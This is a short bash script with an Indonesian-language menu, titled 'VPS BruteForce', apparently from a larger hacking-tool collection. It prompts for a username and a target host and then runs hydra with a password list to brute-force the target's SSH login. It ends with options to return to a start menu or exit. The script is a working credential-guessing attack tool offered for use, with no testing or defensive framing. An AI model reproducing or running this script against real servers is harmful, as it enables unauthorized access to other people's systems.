#!/bin/bash
clear
echo "\n\033[32;1m           ..::|[ VPS BruteForce ]|::..\033[0m"
echo "











"
echo -n "\n\033[31;1mMasukan UserName : "
read user
echo -n "\nMasukan Ip atau Host Server : "
read ip
echo "\n \033[0m"
hydra -l $user -P wodlis/passwords.lst $ip ssh
echo " "
echo "
=> Tekan \033[33mB\033[0m untuk kembali
=> Tekan \033[31mK\033[0m untuk keluar"
echo -n "=> Pilihan: "
read upil
if [ $upil = b ] || [ $upil = B ]
then
clear
sh start
fi

if [ $upil = k ] || [ $upil = K ]
then
clear
sh exit
fi

